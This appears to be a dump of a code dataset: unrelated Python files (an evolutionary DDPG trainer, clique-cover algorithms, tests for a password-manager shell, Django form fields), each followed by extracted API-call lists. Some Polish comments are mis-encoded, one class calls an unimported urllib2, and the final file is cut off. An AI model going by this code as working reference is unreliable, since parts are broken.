[((1113, 1151), 'os.path.join', 'os.path.join', (['root_path', '"""Annotations"""'], {}), "(root_path, 'Annotations')\n", (1125, 1151), False, 'import os\n'), ((1169, 1206), 'os.path.join', 'os.path.join', (['root_path', '"""JPEGImages"""'], {}), "(root_path, 'JPEGImages')\n", (1181, 1206), False, 'import os\n'), ((1223, 1267), 'os.path.join', 'os.path.join', (['root_path', '"""ImageSets"""', '"""Main"""'], {}), "(root_path, 'ImageSets', 'Main')\n", (1235, 1267), False, 'import os\n'), ((1283, 1304), 'tensorbay.dataset.Dataset', 'Dataset', (['DATASET_NAME'], {}), '(DATASET_NAME)\n', (1290, 1304), False, 'from tensorbay.dataset import Dataset\n'), ((1412, 1457), 'tensorbay.opendataset._utility.get_boolean_attributes', 'get_boolean_attributes', (['dataset.catalog.box2d'], {}), '(dataset.catalog.box2d)\n', (1434, 1457), False, 'from tensorbay.opendataset._utility import get_boolean_attributes, get_voc_detection_data\n'), ((1065, 1089), 'os.path.expanduser', 'os.path.expanduser', (['path'], {}), '(path)\n', (1083, 1089), False, 'import os\n'), ((1343, 1368), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1358, 1368), False, 'import os\n'), ((1572, 1618), 'os.path.join', 'os.path.join', (['main_path', 'f"""{segment_name}.txt"""'], {}), "(main_path, f'{segment_name}.txt')\n", (1584, 1618), False, 'import os\n')]
|
from src.ddpg.train import Trainer
from src.ddpg.buffer import MemoryBuffer
from statistics import mean
import gym
import numpy as np
import random
import scipy.stats
class EvolutionaryDDPG:
def __init__(self, n_networks, max_buffer, max_episodes, max_steps, episodes_ready, explore_prob, explore_factors):
self.n = n_networks # liczba sieci
self.max_buffer = max_buffer
self.max_episodes = max_episodes
self.max_steps = max_steps
self.episodes_ready = episodes_ready
if len(self.episodes_ready) < n_networks:
print("episodes_ready.len() != n_networks")
raise Exception
self.explore_prob = explore_prob - int(explore_prob)
self.explore_factors = explore_factors
self.rams = []
# poczฤ
tkowe ostatnie 10 czฤ
stkowych wynikรณw dla wszystkich sieci ustawiamy na -100
self.last_ten_scores = [[-100 for _ in range(10)] for _ in range(self.n)]
self.envs = self.create_envs()
self.ddpgs = self.create_ddpg()
def create_envs(self):
envs = []
for i in range(self.n):
env = gym.make('BipedalWalker-v2')
envs.append(env)
return envs
def create_ddpg(self):
ddpgs = []
for i in range(self.n):
env = self.envs[i]
s_dim = env.observation_space.shape[0]
a_dim = env.action_space.shape[0]
a_max = env.action_space.high[0]
print(' State Dimensions :- ', s_dim)
print(' Action Dimensions :- ', a_dim)
print(' Action Max :- ', a_max)
ram = MemoryBuffer(self.max_buffer)
self.rams.append(ram)
trainer = Trainer(s_dim, a_dim, a_max, ram)
ddpgs.append(trainer)
return ddpgs
def exploit(self, idx):
"""
Eksploatacja polega na jednolitym prรณbkowaniu innego (losowo wybranego) agenta w populacji,
a nastฤpnie porรณwnaniu ostatnich 10 czฤ
stkowych nagrรณd przy uลผyciu Welchโs t-test.
Jeลli prรณbkowany agent ma wyลผszฤ
ลredniฤ
czฤ
stkowฤ
nagrodฤ i speลnia warunki t-test,
wagi z hiperparametrami sฤ
kopiowane do obecnego agenta.
:param idx: indeks sieci, dla ktรณrej wywoลujemy exploit()
"""
# losujemy indeks sieci rรณลผnej od obecnej
random_idx = random.randrange(self.n)
while random_idx == idx:
random_idx = random.randrange(self.n)
# wybieramy lepszฤ
sieฤ
best_net_idx = self.pick_net(idx, random_idx)
# jeลli wylosowana sieฤ okazaลa siฤ byฤ lepsza
if idx != best_net_idx:
# podmieniamy wagi
new_param = self.ddpgs[best_net_idx].actor.parameters()
for param in self.ddpgs[idx].actor.parameters():
param.data.copy_(next(new_param))
new_param = self.ddpgs[best_net_idx].critic.parameters()
for param in self.ddpgs[idx].critic.parameters():
param.data.copy_(next(new_param))
print("<exploit", idx, "> Wczytano nowe wagi z sieci nr ", best_net_idx)
else:
print("<exploit", idx, "> Wagi zostajฤ
, sฤ
lepsze od sieci nr ", random_idx)
def explore(self, idx):
if random.random() < 0.5:
for param in self.ddpgs[idx].actor.parameters():
param.data.mul_(self.explore_factors[0])
for param in self.ddpgs[idx].critic.parameters():
param.data.mul_(self.explore_factors[0])
print("<explore", idx, "> Przemnoลผono wagi przez ", self.explore_factors[0])
else:
for param in self.ddpgs[idx].actor.parameters():
param.data.mul_(self.explore_factors[1])
for param in self.ddpgs[idx].critic.parameters():
param.data.mul_(self.explore_factors[1])
print("<explore", idx, "> Przemnoลผono wagi przez ", self.explore_factors[1])
def pick_net(self, idx1, idx2):
"""
Porรณwnanie nagrรณd czฤ
stkowych dwรณch sieci przy uลผyciu Welch's t-test
:param idx1: obecna sieฤ
:param idx2: losowo wybrana sieฤ
:return: indeks najlepszej sieci
"""
statistic, pvalue = scipy.stats.ttest_ind(self.last_ten_scores[idx1], self.last_ten_scores[idx2],
equal_var=False)
if pvalue <= 0.05:
# przeszลo welch's t-test, teraz porรณwnanie ลrednich z ostatnich 10 wynikรณw
if mean(self.last_ten_scores[idx1]) > mean(self.last_ten_scores[idx2]):
return idx1 # obecna sieฤ lepsza
else:
return idx2 # losowo wybrana sieฤ lepsza
else:
return idx1 # nie przeszลo welch's t-test
def train(self):
# Liczba iteracji algorytmu
for episode in range(self.max_episodes):
# Dla kaลผdej sieci
for ddpg_idx in range(self.n):
trainer = self.ddpgs[ddpg_idx]
ram = self.rams[ddpg_idx]
env = self.envs[ddpg_idx]
# Zresetuj ลrodowisko
observation = env.reset()
# Zliczamy caลkowity uzyskany wynik
total_reward = 0
# Wykonaj max_steps krokรณw
for r in range(self.max_steps):
# env.render()
state = np.float32(observation)
action = trainer.get_exploration_action(state)
new_observation, reward, done, info = env.step(action)
total_reward = total_reward + reward
if not done:
new_state = np.float32(new_observation)
ram.add(state, action, reward, new_state)
observation = new_observation
trainer.optimize()
if done:
break
self.append_score(ddpg_idx, total_reward)
print('NETWORK ', ddpg_idx, ' EPISODE : ', episode, ' SCORE : ', total_reward)
# kaลผda sieฤ ma swรณj max epizodรณw, po ktรณrych zostanฤ
wywoลane metody exploit i explore
if episode % self.episodes_ready[ddpg_idx] == 0 and episode != 0:
self.exploit(ddpg_idx)
if random.random() < self.explore_prob:
self.explore(ddpg_idx)
if episode % 100 == 0:
self.save_ckpt(episode)
def append_score(self, idx, new_score):
"""
Usuwa ostatni wynik z 10 ostatnich czฤ
stkowych wynikรณw i dodaje nowy
:param idx: indeks sieci
:param new_score: nowy wynik
"""
self.last_ten_scores[idx] = self.last_ten_scores[idx][1:]
self.last_ten_scores[idx].append(new_score)
def save_ckpt(self, episode):
idx_ddpg = 0
for ddpg in self.ddpgs:
ddpg.save_models_path(idx_ddpg, episode)
idx_ddpg = idx_ddpg + 1
print('Models saved successfully')
def load_ckpt(self, episode):
idx_ddpg = 0
for ddpg in self.ddpgs:
ddpg.load_models_path('Models/' + str(idx_ddpg) + '_' + str(episode) + '_actor.pt',
'Models/' + str(idx_ddpg) + '_' + str(episode) + '_critic.pt')
idx_ddpg = idx_ddpg + 1
print('Models loaded successfully')
|
[
"gym.make",
"src.ddpg.buffer.MemoryBuffer",
"numpy.float32",
"random.random",
"random.randrange",
"statistics.mean",
"src.ddpg.train.Trainer"
] |
[((2347, 2371), 'random.randrange', 'random.randrange', (['self.n'], {}), '(self.n)\n', (2363, 2371), False, 'import random\n'), ((1135, 1163), 'gym.make', 'gym.make', (['"""BipedalWalker-v2"""'], {}), "('BipedalWalker-v2')\n", (1143, 1163), False, 'import gym\n'), ((1630, 1659), 'src.ddpg.buffer.MemoryBuffer', 'MemoryBuffer', (['self.max_buffer'], {}), '(self.max_buffer)\n', (1642, 1659), False, 'from src.ddpg.buffer import MemoryBuffer\n'), ((1716, 1749), 'src.ddpg.train.Trainer', 'Trainer', (['s_dim', 'a_dim', 'a_max', 'ram'], {}), '(s_dim, a_dim, a_max, ram)\n', (1723, 1749), False, 'from src.ddpg.train import Trainer\n'), ((2430, 2454), 'random.randrange', 'random.randrange', (['self.n'], {}), '(self.n)\n', (2446, 2454), False, 'import random\n'), ((3252, 3267), 'random.random', 'random.random', ([], {}), '()\n', (3265, 3267), False, 'import random\n'), ((4499, 4531), 'statistics.mean', 'mean', (['self.last_ten_scores[idx1]'], {}), '(self.last_ten_scores[idx1])\n', (4503, 4531), False, 'from statistics import mean\n'), ((4534, 4566), 'statistics.mean', 'mean', (['self.last_ten_scores[idx2]'], {}), '(self.last_ten_scores[idx2])\n', (4538, 4566), False, 'from statistics import mean\n'), ((5398, 5421), 'numpy.float32', 'np.float32', (['observation'], {}), '(observation)\n', (5408, 5421), True, 'import numpy as np\n'), ((5692, 5719), 'numpy.float32', 'np.float32', (['new_observation'], {}), '(new_observation)\n', (5702, 5719), True, 'import numpy as np\n'), ((6343, 6358), 'random.random', 'random.random', ([], {}), '()\n', (6356, 6358), False, 'import random\n')]
|
from collections import defaultdict
import numpy as np
import networkx as nx
import networkx.algorithms.approximation as approx
import networkx.algorithms.coloring as coloring
import pulp
def clique_random_sequential(graph : nx.Graph) -> list:
"""Perform minimum clique cover with random sequential greedy method
This method will create clique greedily. At least finish with O(|V|^2).
Args:
graph (nx.Graph): graph to solve
Returns:
list: list of node names for each clique
"""
graph = graph.copy()
clique_list = []
while len(graph.nodes())>0:
clique = []
node_list = list(graph.nodes())
np.random.permutation(node_list)
for node in node_list:
flag = True
for exist_node in clique:
if node not in graph[exist_node]:
flag =False
break
if flag:
clique.append(node)
graph.remove_nodes_from(clique)
clique_list.append(clique)
return clique_list
def clique_approx_find_greedy_eliminate(graph: nx.Graph) -> list:
"""Perform minimum clique cover by approximatly find maximum clique and iteratively eliminate it.
Find the maximum clique with approximatino methods and iteratively eliminate it.
Args:
graph (nx.Graph): graph to solve
Returns:
list: list of node names for each clique
"""
_, clique_list = approx.clique_removal(graph)
clique_list = [list(item) for item in clique_list]
return clique_list
def clique_exact_find_greedy_eliminate(graph: nx.Graph) -> list:
"""Perform minimum clique cover by exactly find maximum clique and iteratively eliminate it.
Find the maximum clique by enumerating all the cliques and iteratively eliminate it.
Args:
graph (nx.Graph): graph to solve
Returns:
list: list of node names for each clique
"""
graph = graph.copy()
clique_list = []
while len(graph.nodes())>0:
max_size = 0
max_clique = []
for clique in nx.find_cliques(graph):
size = len(clique)
if size > max_size:
max_size = size
max_clique = clique
graph.remove_nodes_from(max_clique)
clique_list.append(max_clique)
return clique_list
def clique_exact_find_once_greedy_eliminate(graph: nx.Graph) -> list:
"""Perform minimum clique cover by exactly find maximum clique and iteratively eliminate it.
Find the maximum clique by enumerating all the cliques once and iteratively eliminate it.
Args:
graph (nx.Graph): graph to solve
Returns:
list: list of node names for each clique
"""
max_cliques = sorted(nx.find_cliques(graph), key=lambda x: len(x), reverse=True)
max_cliques = [set(i) for i in max_cliques]
clique_list = []
while np.sum([len(i) for i in max_cliques]) > 0:
max_clique = max_cliques[0]
max_cliques = [i - max_clique for i in max_cliques]
max_cliques = sorted(max_cliques, key=lambda x: len(x), reverse=True)
clique_list.append(max_clique)
return clique_list
def coloring_greedy(graph: nx.Graph, strategy: str) -> list:
"""Perform minimum clique cover by reducing problem into coloring problem and using approximation methods.
See https://networkx.github.io/documentation/stable/reference/algorithms/coloring.html
for detailed algorithms
Args:
graph (nx.Graph): graph to solve
strategy (str): name of strategy
Returns:
list: list of node names for each clique
"""
graph = nx.complement(graph)
result = coloring.greedy_color(graph, strategy=strategy)
clique_dict = defaultdict(list)
for node,color in result.items():
clique_dict[color].append(node)
return list(clique_dict.values())
class AbortedError(Exception):
pass
def integer_programming(graph: nx.Graph) -> list:
"""Perform minimum clique cover by reducing problem into integer programming.
If solver says optimal, optimal solution for minimum clique cover is obtained,
but it may take very long time for large problems.
TODO: Check installation of commercial IP solvers such as CPLEX, Gurobi, and
use them if they are installed.
Args:
graph (nx.Graph): graph to solve
Returns:
list: list of node names for each clique
Raises:
Exception: Solver cannot solve IP problem.
"""
problem = pulp.LpProblem("clique_cover", pulp.LpMinimize)
clique_max_count = len(graph.nodes())
clique_vars = []
for ind in range(clique_max_count):
var = pulp.LpVariable("clique{}".format(ind), cat="Binary")
clique_vars.append(var)
node_belong_vars = []
for ind in range(clique_max_count):
node_belong_vars.append({})
for node in graph.nodes():
nodename = str(node)
nodename = nodename.replace(" ","0").replace(" i","1").replace(" -","2").replace("-i","3")
var = pulp.LpVariable("{}_{}".format(nodename,ind), cat = "Binary")
node_belong_vars[ind][node] = var
# minimize used cliques
problem += sum(clique_vars)
# if node belongs, clique must be used
for ind in range(clique_max_count):
for node in graph.nodes():
problem += (node_belong_vars[ind][node] <= clique_vars[ind])
# clique must be exclusive
for node in graph.nodes():
items = []
for ind in range(clique_max_count):
items.append(node_belong_vars[ind][node])
problem += (sum(items)==1)
# not-neighboring nodes cannot belong the same clique
for ind in range(clique_max_count):
for i1, n1 in enumerate(graph.nodes()):
for i2, n2 in enumerate(graph.nodes()):
if i2<=i1: continue
if n2 not in graph[n1]:
problem += (node_belong_vars[ind][n1]+node_belong_vars[ind][n2]<=1)
#status = problem.solve()
import multiprocessing
cpu_count = multiprocessing.cpu_count()
status = problem.solve(pulp.PULP_CBC_CMD(threads=cpu_count, keepFiles=0, mip=1, maxSeconds=5))
#status = problem.solve(pulp.PULP_CBC_CMD(maxSeconds=5, msg=0, fracGap=0))
#print(problem)
#print(pulp.LpStatus[status])
#print(problem.objective.value())
# cannot solve
if status <= 0:
raise AbortedError("Solver cannot solve problem.")
clique_dict = defaultdict(list)
node_count = 0
for node in graph.nodes():
for index in range(clique_max_count):
var = node_belong_vars[index][node]
if(var.value()>=0.5):
clique_dict[index].append(node)
node_count += 1
break
return list(clique_dict.values())
strategy_func = {
"clique_random_sequential" : clique_random_sequential,
"clique_approx_find_greedy_eliminate" : clique_approx_find_greedy_eliminate,
"clique_exact_find_greedy_eliminate" : clique_exact_find_greedy_eliminate,
"clique_exact_find_once_greedy_eliminate" : clique_exact_find_once_greedy_eliminate,
"coloring_largest_first" : None,
"coloring_smallest_last" : None,
"coloring_random_sequential" : None,
"coloring_independent_set" : None,
"coloring_connected_sequential_bfs" : None,
"coloring_connected_sequential_dfs" : None,
"coloring_saturation_largest_first" : None,
"integer_programming" : integer_programming,
}
clique_cover_strategies = strategy_func.keys()
def clique_cover(graph: nx.graph, strategy:str ="clique_random_sequential") -> list:
"""Perform minimum clique cover using several strategies
Args:
graph (nx.Graph): graph to solve
strategy (str): name of strategy
Returns:
list: list of node names for each clique
"""
if strategy not in strategy_func:
raise ValueError("Unknown strategy, choose from {}".format(strategy_func.keys()))
coloring_prefix = "coloring_"
if coloring_prefix in strategy:
return coloring_greedy(graph, strategy = strategy[len(coloring_prefix):])
return strategy_func[strategy](graph)
|
[
"networkx.algorithms.coloring.greedy_color",
"networkx.complement",
"collections.defaultdict",
"networkx.find_cliques",
"numpy.random.permutation",
"pulp.LpProblem",
"pulp.PULP_CBC_CMD",
"networkx.algorithms.approximation.clique_removal",
"multiprocessing.cpu_count"
] |
[((1497, 1525), 'networkx.algorithms.approximation.clique_removal', 'approx.clique_removal', (['graph'], {}), '(graph)\n', (1518, 1525), True, 'import networkx.algorithms.approximation as approx\n'), ((3741, 3761), 'networkx.complement', 'nx.complement', (['graph'], {}), '(graph)\n', (3754, 3761), True, 'import networkx as nx\n'), ((3776, 3823), 'networkx.algorithms.coloring.greedy_color', 'coloring.greedy_color', (['graph'], {'strategy': 'strategy'}), '(graph, strategy=strategy)\n', (3797, 3823), True, 'import networkx.algorithms.coloring as coloring\n'), ((3843, 3860), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (3854, 3860), False, 'from collections import defaultdict\n'), ((4632, 4679), 'pulp.LpProblem', 'pulp.LpProblem', (['"""clique_cover"""', 'pulp.LpMinimize'], {}), "('clique_cover', pulp.LpMinimize)\n", (4646, 4679), False, 'import pulp\n'), ((6243, 6270), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (6268, 6270), False, 'import multiprocessing\n'), ((6670, 6687), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (6681, 6687), False, 'from collections import defaultdict\n'), ((687, 719), 'numpy.random.permutation', 'np.random.permutation', (['node_list'], {}), '(node_list)\n', (708, 719), True, 'import numpy as np\n'), ((2143, 2165), 'networkx.find_cliques', 'nx.find_cliques', (['graph'], {}), '(graph)\n', (2158, 2165), True, 'import networkx as nx\n'), ((2833, 2855), 'networkx.find_cliques', 'nx.find_cliques', (['graph'], {}), '(graph)\n', (2848, 2855), True, 'import networkx as nx\n'), ((6299, 6369), 'pulp.PULP_CBC_CMD', 'pulp.PULP_CBC_CMD', ([], {'threads': 'cpu_count', 'keepFiles': '(0)', 'mip': '(1)', 'maxSeconds': '(5)'}), '(threads=cpu_count, keepFiles=0, mip=1, maxSeconds=5)\n', (6316, 6369), False, 'import pulp\n')]
|
import shutil
import time
from pathlib import Path
from threading import Event
import pytest
from keybox.main import main as keybox_main
from keybox.ui import BaseUI
from keybox.shell import ShellUI, BaseInput
from .expect import Expect, ExpectCopy, Send, DelayedSend
config_filename = 'test_keybox.conf'
safe_filename = 'test_keybox.safe'
passphrase = '<PASSWORD>'
dummy_filename = Path(__file__).parent / "dummy_keybox.safe"
dummy_passphrase = "<PASSWORD>"
@pytest.fixture()
def config_file(tmp_path):
return tmp_path / config_filename
@pytest.fixture()
def safe_file(tmp_path):
return tmp_path / safe_filename
@pytest.fixture()
def prepare_script(monkeypatch, capfd):
script = []
timeouted = Event()
def check_captured():
captured = capfd.readouterr()
assert captured.err == ''
out = captured.out
while out:
cmd = script.pop(0)
out = cmd.expect(out)
def expect_copy(_self, text):
check_captured()
cmd = script.pop(0)
cmd.expect_copy(str(text))
def feed_input(_self, prompt):
check_captured()
script.pop(0).expect(prompt)
feed = script.pop(0).send()
if timeouted.is_set():
raise TimeoutError
return feed
def raise_timeout(*_args, **_kwargs):
timeouted.set()
def dummy(*_args, **_kwargs):
pass
monkeypatch.setattr(ShellUI, '_input', feed_input, raising=True)
monkeypatch.setattr(BaseUI, '_input', feed_input, raising=True)
monkeypatch.setattr(BaseUI, '_input_pass', feed_input, raising=True)
monkeypatch.setattr(BaseUI, '_copy', expect_copy, raising=True)
monkeypatch.setattr(BaseInput, '__init__', dummy, raising=True)
monkeypatch.setattr(BaseInput, 'input', feed_input, raising=True)
monkeypatch.setattr(BaseInput, 'cancel', raise_timeout, raising=True)
def prepare(*script_items):
script.extend(script_items)
yield prepare
check_captured()
assert len(script) == 0
def test_shell(prepare_script, config_file, safe_file):
assert not safe_file.exists()
temp_pass = '<PASSWORD>'
prepare_script(
# Initialize
Expect(f"Loading config {str(config_file)!r}...\n"),
Expect(f"Opening file {str(safe_file)!r}... "),
Expect(f"Not found.\n"),
Expect("Create new keybox file? [Y/n] "),
Send("y"),
Expect("Enter new passphrase: "),
Send(temp_pass),
Expect("Re-enter new passphrase: "),
Send(temp_pass),
# Shell completer
Expect("> "),
Send("m p blah"),
Expect("No record selected. See `help select`.\n"),
# Add command
Expect("> "),
Send("add"),
Expect("User: "),
Send("jackinthebox"),
Expect("Password: "),
Send("pw123"),
Expect("Site: "),
Send("Example"),
Expect("URL: "),
Send("http://example.com/"),
Expect("Tags: "),
Send("web test"),
Expect("Note: "),
Send(""),
# List
Expect("> "),
Send("l"),
Expect("Example jackinthebox http://example.com/ web test "
"%s \\d{2}:\\d{2}:\\d{2} \n" % time.strftime("%F"),
regex=True),
# Count
Expect("> "),
Send("count"),
Expect("1\n"),
# Write
Expect("> "),
Send("w"),
Expect(f"Changes saved to file {str(safe_file)!r}.\n"),
# Select
Expect("> "),
Send("s"),
Expect("Example jackinthebox http://example.com/ web test "
"%s \\d{2}:\\d{2}:\\d{2} \n" % time.strftime("%F"),
regex=True),
# Print
Expect("> "),
Send("p"),
Expect("pw123\n"),
# Select with args
Expect("> "),
Send("select nonexisting"),
Expect("Not found.\n"),
Expect("> "),
Send("select example"),
Expect("Example jackinthebox http://example.com/ web test "
"%s \\d{2}:\\d{2}:\\d{2} \n" % time.strftime("%F"),
regex=True),
# Reset
Expect("> "),
Send("reset"),
Expect("Enter current passphrase: "),
Send(temp_pass),
Expect("Enter new passphrase: "),
Send(passphrase),
Expect("Re-enter new passphrase: "),
Send(passphrase),
# Is the password still okay after re-encryption?
Expect("> "),
Send("p"),
Expect("pw123\n"),
# Check
Expect("> "),
Send("ch"),
# Delete
Expect("> "),
Send("d"),
Expect("Delete selected record? This cannot be taken back! [y/n] "),
Send("y"),
Expect("Record deleted.\n"),
# Finish
Expect("> "),
Send("quit"),
Expect(f"Changes saved to file {str(safe_file)!r}.\n"),
)
keybox_main(["shell", "-c", str(config_file), "-f", str(safe_file),
'--timeout', '10'])
def test_timeout(prepare_script, config_file, safe_file):
shutil.copyfile(dummy_filename, safe_file)
prepare_script(
# Initialize
Expect(f"Loading config {str(config_file)!r}...\n"),
Expect(f"Opening file {str(safe_file)!r}... "),
Expect("\n"),
Expect("Passphrase: "),
Send(dummy_passphrase),
# Finish
Expect("> "),
DelayedSend(1.1, "too late"),
Expect("Timeout after 1 seconds.\n"),
)
keybox_main(["shell", "-c", str(config_file), "-f", str(safe_file),
'--timeout', '1'])
def test_readonly(prepare_script, config_file, safe_file):
shutil.copyfile(dummy_filename, safe_file)
prepare_script(
# Initialize
Expect(f"Loading config {str(config_file)!r}...\n"),
Expect(f"Opening file {str(safe_file)!r}... \n"),
Expect("Passphrase: "),
Send(dummy_passphrase),
# Check read-only mode
Expect("Open in read-only mode.\n"),
Expect("> "),
Send("reset"),
Expect("Read-only mode.\n"),
Expect("> "),
Send("q"),
)
keybox_main(["shell", "-c", str(config_file), "-f", str(safe_file),
'--read-only', '--timeout', '1'])
def test_print(prepare_script, config_file, safe_file):
shutil.copyfile(dummy_filename, safe_file)
filter_expr = 'test'
prepare_script(
# Initialize
Expect(f"Loading config {str(config_file)!r}...\n"),
Expect(f"Opening file {str(safe_file)!r}... \n"),
Expect("Passphrase: "),
Send(dummy_passphrase),
# Check read-only mode
Expect("Open in read-only mode.\n"),
Expect(f"Searching for '{filter_expr}'...\n"),
Expect("test test http://test.test test 2021-11-06 20:23:59 test! \n"),
Expect('test\n'), # this is the password
)
keybox_main(["print", filter_expr, "-c", str(config_file), "-f", str(safe_file)])
def test_copy(prepare_script, config_file, safe_file):
shutil.copyfile(dummy_filename, safe_file)
filter_expr = 'test'
prepare_script(
# Initialize
Expect(f"Loading config {str(config_file)!r}...\n"),
Expect(f"Opening file {str(safe_file)!r}... \n"),
Expect("Passphrase: "),
Send(dummy_passphrase),
# Check read-only mode
Expect("Open in read-only mode.\n"),
Expect(f"Searching for '{filter_expr}'...\n"),
Expect("test test http://test.test test 2021-11-06 20:23:59 test! \n"),
ExpectCopy('test'), # this is the password
)
keybox_main(["copy", filter_expr, "-c", str(config_file), "-f", str(safe_file)])
def test_pwgen(prepare_script, config_file, safe_file):
shutil.copyfile(dummy_filename, safe_file)
prepare_script(
Expect(10 * "(\\S{20}) (\\S{20,100})\n", regex=True),
)
keybox_main(["pwgen", "-l", "20", "-u", "1", "-d", "1", "-s", "1"])
|
[
"pytest.fixture",
"time.strftime",
"pathlib.Path",
"threading.Event",
"keybox.main.main",
"shutil.copyfile"
] |
[((467, 483), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (481, 483), False, 'import pytest\n'), ((552, 568), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (566, 568), False, 'import pytest\n'), ((633, 649), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (647, 649), False, 'import pytest\n'), ((723, 730), 'threading.Event', 'Event', ([], {}), '()\n', (728, 730), False, 'from threading import Event\n'), ((5115, 5157), 'shutil.copyfile', 'shutil.copyfile', (['dummy_filename', 'safe_file'], {}), '(dummy_filename, safe_file)\n', (5130, 5157), False, 'import shutil\n'), ((5704, 5746), 'shutil.copyfile', 'shutil.copyfile', (['dummy_filename', 'safe_file'], {}), '(dummy_filename, safe_file)\n', (5719, 5746), False, 'import shutil\n'), ((6361, 6403), 'shutil.copyfile', 'shutil.copyfile', (['dummy_filename', 'safe_file'], {}), '(dummy_filename, safe_file)\n', (6376, 6403), False, 'import shutil\n'), ((7073, 7115), 'shutil.copyfile', 'shutil.copyfile', (['dummy_filename', 'safe_file'], {}), '(dummy_filename, safe_file)\n', (7088, 7115), False, 'import shutil\n'), ((7787, 7829), 'shutil.copyfile', 'shutil.copyfile', (['dummy_filename', 'safe_file'], {}), '(dummy_filename, safe_file)\n', (7802, 7829), False, 'import shutil\n'), ((7924, 7991), 'keybox.main.main', 'keybox_main', (["['pwgen', '-l', '20', '-u', '1', '-d', '1', '-s', '1']"], {}), "(['pwgen', '-l', '20', '-u', '1', '-d', '1', '-s', '1'])\n", (7935, 7991), True, 'from keybox.main import main as keybox_main\n'), ((388, 402), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (392, 402), False, 'from pathlib import Path\n'), ((3258, 3277), 'time.strftime', 'time.strftime', (['"""%F"""'], {}), "('%F')\n", (3271, 3277), False, 'import time\n'), ((3691, 3710), 'time.strftime', 'time.strftime', (['"""%F"""'], {}), "('%F')\n", (3704, 3710), False, 'import time\n'), ((4116, 4135), 'time.strftime', 'time.strftime', (['"""%F"""'], {}), "('%F')\n", (4129, 4135), False, 'import time\n')]
|
import re
import warnings
import mimetypes
# import urllib2
from functools import total_ordering
from django.utils.encoding import force_text
from django.utils import six
import os
from django.utils.six.moves.urllib.request import urlopen
from django.utils.six.moves.urllib.parse import urlparse
from django import forms
from django.core.validators import URLValidator
from django.core.files.uploadedfile import SimpleUploadedFile
from ginger import ui, utils, paginator
from ginger.utils import feet_inches_to_cm, cm_to_feet_inches
from .widgets import EmptyWidget
__all__ = ["FileOrUrlInput", "HeightField", "HeightWidget", "SortField", "GingerDataSetField", "GingerSortField",
"GingerPageField"]
@total_ordering
class _SortableNone(object):
def __ge__(self, other):
return False
def __le__(self, other):
return True
def __eq__(self, other):
return self is other
SortableNone = _SortableNone()
class FileOrUrlInput(forms.ClearableFileInput):
def download_url(self, name, url):
validate = URLValidator()
try:
validate(url)
except forms.ValidationError as _:
raise
return None
parsed_url = urlparse(url)
path = parsed_url[2].strip("/")
name = os.path.basename(path)
opener = urllib2.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
ze_file = opener.open(url).read()
file_obj = SimpleUploadedFile(name=name, content=ze_file, content_type=mimetypes.guess_type(name))
file_obj.url = url
return file_obj
def value_from_datadict(self, data, files, name):
if name in data and name not in files:
url = forms.HiddenInput().value_from_datadict(data, files, name)
result = self.download_url(name, url) if url and isinstance(url, six.string_types) else None
files = files.copy() if files else {}
files[name] = result
return super(FileOrUrlInput, self).value_from_datadict(data, files, name)
class HeightWidget(forms.MultiWidget):
def __init__(self, *args, **kwargs):
widgets = [forms.TextInput(attrs={'placeholder': '5', 'size': '3'}), forms.TextInput(attrs={'placeholder': '6',
'size': '3'})]
super(HeightWidget,self).__init__(widgets, *args, **kwargs)
def decompress(self, value):
if value:
result = cm_to_feet_inches(value)
return result
else:
return [None,None]
def format_output(self, rendered_widgets):
return "%s ft %s inches" % tuple(rendered_widgets)
class HeightField(forms.MultiValueField):
widget = HeightWidget
def __init__(self, *args, **kwargs):
kwargs.pop('min_value',None)
errors = self.default_error_messages.copy()
if 'error_messages' in kwargs:
errors.update(kwargs['error_messages'])
reqd = kwargs.setdefault('required', False)
fields = (
forms.IntegerField(min_value=0,required=reqd),
forms.IntegerField(min_value=0,required=reqd),
)
super(HeightField, self).__init__(fields, *args, **kwargs)
def compress(self, data_list):
if data_list and all(d is not None for d in data_list):
feet, inches = data_list
return feet_inches_to_cm(feet, inches)
return None
class GingerSortField(forms.ChoiceField):
def __init__(self, choices=(), toggle=True, **kwargs):
kwargs.setdefault("required", False)
kwargs.setdefault("widget", forms.HiddenInput)
super(GingerSortField, self).__init__(choices=choices, **kwargs)
self.toggle = toggle
field_map = {}
new_choices = []
for i, (value, label) in enumerate(choices):
position = str(i)
new_choices.append((position, label))
field_map[position] = re.sub(r'\s+', ' ', value.strip())
self.choices = tuple(new_choices)
self.field_map = field_map
def valid_value(self, value):
"Check to see if the provided value is a valid choice"
text_value = force_text(value)
if text_value.startswith("-"):
text_value = text_value[1:]
return text_value in self.field_map or super(GingerSortField, self).valid_value(text_value)
def build_links(self, request, bound_field):
value = bound_field.value()
field_name = bound_field.name
text_value = force_text(value) if value is not None else None
for k, v in self.choices:
content = force_text(v)
key = force_text(k)
is_active = text_value and text_value == key
if is_active and self.toggle:
next_value = key if text_value.startswith("-") else "-%s" % key
else:
next_value = key
url = utils.get_url_with_modified_params(request, {field_name: next_value})
yield ui.Link(url=url, content=content, is_active=is_active)
def invert_sign(self, name, neg):
if name.startswith("-"):
neg = not neg
return "%s%s" % ("-" if neg else "", name.lstrip("-"))
def handle_queryset(self, queryset, key, bound_field):
neg = key.startswith("-")
value = self.field_map[key.lstrip("-")]
invert = lambda a: self.invert_sign(a, neg)
values = map(invert, value.split())
return queryset.order_by(*values)
def get_value_for_name(self, name):
for value, key in six.iteritems(self.field_map):
if name == key:
return value
class GingerDataSetField(GingerSortField):
def __init__(self, dataset_class, process_list=False, **kwargs):
column_dict = dataset_class.get_column_dict()
self.reverse = kwargs.pop("reverse", False)
choices = [(name, col.label or name.title()) for name, col in six.iteritems(column_dict) if not col.hidden]
super(GingerDataSetField, self).__init__(choices=choices, **kwargs)
self.dataset_class = dataset_class
self.process_list = process_list
def handle_queryset(self, queryset, value, bound_field):
text_value = force_text(value) if value is not None else None
if not text_value:
return queryset
reverse = text_value.startswith("-")
column_dict = self.dataset_class.get_column_dict()
name = text_value[1:] if reverse else text_value
